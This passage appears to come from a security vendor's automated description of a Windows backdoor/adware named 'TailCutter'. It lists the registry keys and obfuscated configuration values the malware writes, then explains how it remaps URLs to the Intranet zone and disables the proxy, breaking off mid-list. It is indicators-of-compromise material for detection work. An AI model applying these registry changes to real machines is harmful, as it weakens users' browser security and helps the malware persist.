"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"3c09c42b" = "///%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f0bf0bde" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"414bc593" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
"c6c5dd44" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d1abcdb6" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"iiid" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB D9 BC F2 72 8D E9 64 75 E5 45 0A 51 D4 15 46"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svn" = "TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svi" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"dlpath" = "c:\progra~1\tailcu~1\tailcu~1.dll"
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"3efeb33e" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2e22d94e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.1" = "6t1JF1FHwysurpnikg"
"usr.0" = "oMUlaLmjlhabcdefAB"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"c6d15ff2" = "%Program Files%\TailCutter\TailCutter.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"uuid" = "12802899647634509424"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"a2e3b941" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Install_Dir" = "%Program Files%\TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svn" = "TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svi" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1520c6f1" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svt" = "1431212851"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"InstallDate" = "20140510"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svpath" = "c:\Program Files\TailCutter\TailCutter.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"CategoryName" = "%SearchDefenderUpdaterKeys_CategoryName%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Mode" = "4026531840"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Version" = "22022131"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"date" = "1431212812"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7367429f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svt" = "1431212851"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Version" = "22022131"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"

The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

